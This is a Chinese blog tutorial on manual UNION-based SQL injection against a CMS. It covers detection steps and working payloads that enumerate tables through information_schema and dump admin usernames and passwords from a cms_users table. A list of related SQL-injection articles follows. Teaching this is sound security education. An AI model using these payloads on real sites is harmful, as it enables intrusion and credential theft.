SQL语句手工注入 利用联合查询获取cms网站后台管理员帐密。

最新推荐文章于 2023-08-22 22:44:47 发布
最新推荐文章于 2023-08-22 22:44:47 发布
阅读量431 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42094992/article/details/107618971
版权

1.修改ID参数判断是否有回显

2. 添加单引号【'】,判断数据库是否有报错

3. 根据报错信息判断输入的数据是字符型还是数字型? 字符型就意味着参数左右两边有引号(单引号和双引号) 数字型就意味着数字参数左右两边没有引号。

关于引号的闭合

【?id=5' and 1=10000 --+】
 

4.是否会回显报错信息?

考虑到报错注入

5.判断是否有布尔类型状态?

6.判断是否有延时?

常用语句和函数
information_schema
 
1. 存储了 mysql 数据库中所有的元数据:库名、表名、字段名。

联合查询

1.基础知识

union select
@ 保证两个 select 语句查询的虚拟表具有相同的列数。
@ 【弱化】相同的列,具有相同的数据类型。
@ 跨库跨表查询。

2.判断列数

order by 给出1-15个字段会有回显

说明:程序中的SQL语句有15列

3.判断显示位

4.数据库的名字

?id=32 and 1=2 union select 1,2,(UNHEX(HEX(database))),4,5,6,7,8,9,10,11,12,13,14,15 --+

5.查询所有的表名

?id=32 and 1=2 union select 1,2,group_concat(UNHEX(HEX(table_name))),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() --+

6. 获取字段名

  
?id=32 and 1=2 union select 1,2,group_concat(UNHEX(HEX(column_name))),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name='cms_users' and table_schema=database() --+

7.获取字段内容

?id=32 and 1=2 union select 1,2,username,4,5,6,7,8,9,10,password,12,13,14,15 from cms_users

火中的冰~
关注
专栏目录
利用联合查询获取cms 网站后台管理帐密
weixin_49550274的博客
07-29 508
环境准备:window2008上搭建有有cms网站;物理机上的firefox浏览器上添加的有hackbar附加组件 windows2008kaiqiphpstud并查看ip地址,在物理机上的firefox浏览器上访问ip地址,进入cms网站后台界面 ##查看cms网站收i否存在漏洞 随机进入一篇文章,摁F12键找到hackbar,将地址栏的信息复制到hackbar组件下的空白栏;改变id参数,看页面是否有变化 改变id参数,页面会发生改变,且无报错,说明存在sql注入漏洞。 #联合查询 ##判断列数
初学SQL注入联合查询
m0_46397814的博客
07-27 594
SQL注入原理 1、程序在处理程序的过程和数据交互时,使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤,便将参数的内容拼接到SQL语句中。 SQL注入的危害 1、攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理的后台密码),从而脱去数据库中的内容,简称脱库。 2、在特别的情况下还可以修改数据库内容、插人内容到数据库或者删除数据库中的内容。 3、如果数据库权限分配存在问题,或者数据库本身存在缺陷,攻击者可以利用SQL注入漏洞读写文件,读取敏感文件或者上传恶意文件,可
SQL注入原理--手工联合查询注入技术
Unitue_逆流
01-25 7997
** 实验目的:理解联合查询原理、学习联合查询过程 **实验原理: 1、链接后面添加【order by 11(数字任意)】根据页面返回结果,来判断站点中的字段数目 2、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】进行联合查询,来暴露可查询的字段编号 3、根据上一步得到的字段编号,查询语句【union se...
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
weixin_33737134的博客
10-25 963
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何...
基于phpcms的SQL手工注入
qq_44060093的博客
08-20 523
步骤一: 探测目标网站有无sql注入点 试探目标网站 分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。 and 1=1 and 1=2 发现不需要闭合但引号,判断为注入类型为整数型 第一次加单引号时,发生报错,发现了数据库类型为mysql 步骤二、判断字段长度 利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15 判断字段为15个 步骤三、判断字段
利用联合查询获取cms网站后台管理账密
LainWith的博客
07-28 294
从数据库原理了解什么是sql注入
heibaikong6的博客
12-04 1024
文章目录数据库相关概念 数据库相关概念
Beescms_v4.0 sql注入漏洞复现与原理分析(白盒与黑盒)
不想当脚本小子的脚本小子
12-27 2544
一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1.官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html,然后解压压缩文件,然后把文件放到phpstudy的网站根目录 2.浏览器访问http://安装目录/install,开始安装 一直下一步出现如下界面即可安装完成: 安装完成后修改my.ini文件,在[mysqld]后面添加secure_fil
yxcms1.4.7版本审计sql注入-文件删除盲注配合dnslog解析数据
qq_29437513的博客
08-16 835
这是一篇cms审计内容,和之前做的文件包含+伪协议、反序列化入门内容不同,,拿项目练手。 我找了一下网上关于yxcms的漏洞,谷歌收录到1.4.6存在前台注入和后台文件删除盲注这两个洞,,对比发现1,4,7版本源码几乎相同。 下好1.4.7源码放到www目录下,访问进入了一个安装的页面 在找漏洞审计之前,登录后台关闭后登不上,提示站点账户锁定,这里折腾了很久,所以整个审计过程都不能关闭后台。 然后打开phpstorm开始审计源码: 这里我对phpstorm的操作不了解,看del函数这里 刚开始审计也不
SQL注入
ChanCherry的博客
10-15 454
SQL注入漏洞 主流的数据库 SQL注入原理 SQL注入攻击的本质,服务端没有过滤用户输入的恶意数据,直接把它当成SQL命令来执行了,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入; 原本程序要执行的SQL语句,拼接了用户输入的恶意数据。 导致的危害 造成的原因 SQL注入方法 ...
SQL手工注入大全,包含各种数据库
04-30
详细讲解各种数据库的sql注入方法,不管是搞安全还是搞开发都可以看一看,希望大家下载!
SQL注入----利用联合查询获取 cms 网站后台管理账密
最新发布
SSDOK1O2的博客
08-22 129
SQL注入----利用联合查询获取 cms 网站后台管理账密
phpcms手工注入教程
浅笑996的博客
10-24 608
目标服务器(靶机):192.168.1.27 目标网站:http://192.168.1.27:8083 攻击机器:利用镜像win2k8创建云主机,并作为攻击机 步骤: 一、靶机操作 1、进入靶机,查看IP地址; 开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig 显示,靶机配置信息,记下以太网适配器下,IPv4地址(后面访问网页会用到)。 此处为192.168.1.27 2、启动...
SQL注入手工注入
Eternity18的博客
12-02 2172
web渗透测试的sql注入手工注入
mysql 联合查询 注入,Mysql 联合查询手工注入详解
weixin_35215045的博客
03-17 438
0x00 演示环境Windows 7 64位旗舰版PHPStudy测试环境:DownloadNavicat:Download代码编辑器(我用的Sublime Text3,也可以用Vscode或者notepad++等,具体资源可在网上找)以下配置步骤比较详细,大佬请直接跳过,导入数据库,编辑代码连接信息即可安装好PHPStudy后,将测试环境解压,sql.php置于phpstudy目录下的WWW文件...
3-6SQL注入网站实例第五步:攻破后台获取web管理权限
山兔的博客
02-15 2597
当我们得到上位点之后,并且对上位点进行了充分的测试,测试的目标是得到了确认的信息,它是可以显示我们想要的数据库信息,所有的表信息,所有的字段信息,甚至,我们可以得到后台管理的权限,那么本篇,我们就来解决这个问题 利用上位点进行爆库,获得后台管理的权限 1.获得当前连接的所有数据库名 我们仍然对这个上位点,进行测试,我们要查询所有数据库,我们对information_schema下的schemata表,其它的我们暂时留空,留空这里我们用单引号括起来, https://61.206.45.132/corp/
cms文件管理系统靶场的手动SQL注入
qq_42589016的博客
06-17 2213
CSM文件管理系统SQL注入
利用CMS漏洞渗透并获取某服务器权限
热门推荐
wodafa的博客
03-14 1万+
在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和密码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分利用既有CMS漏洞,通过CMS漏洞来获取webshell。目前使用流行架构,特别是一键式部署的系统
熊海CMS网站SQL注入、XSS攻击、cookie篡改
m0_63917373的博客
11-01 2027
熊海CMS sqlmap工具 SQL注入 XSS cookie篡改
"利用联合查询实现CMS网站后台管理账密获取,详细过程!
sql注入联合查询是指通过在SQL语句中插入恶意代码来获取系统敏感信息或窃取用户数据的一种常见攻击方式。本文将详细介绍在CMS系统中使用联合查询进行SQL注入攻击的过程。 首先,我们需要确定注入点。通过对比两个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值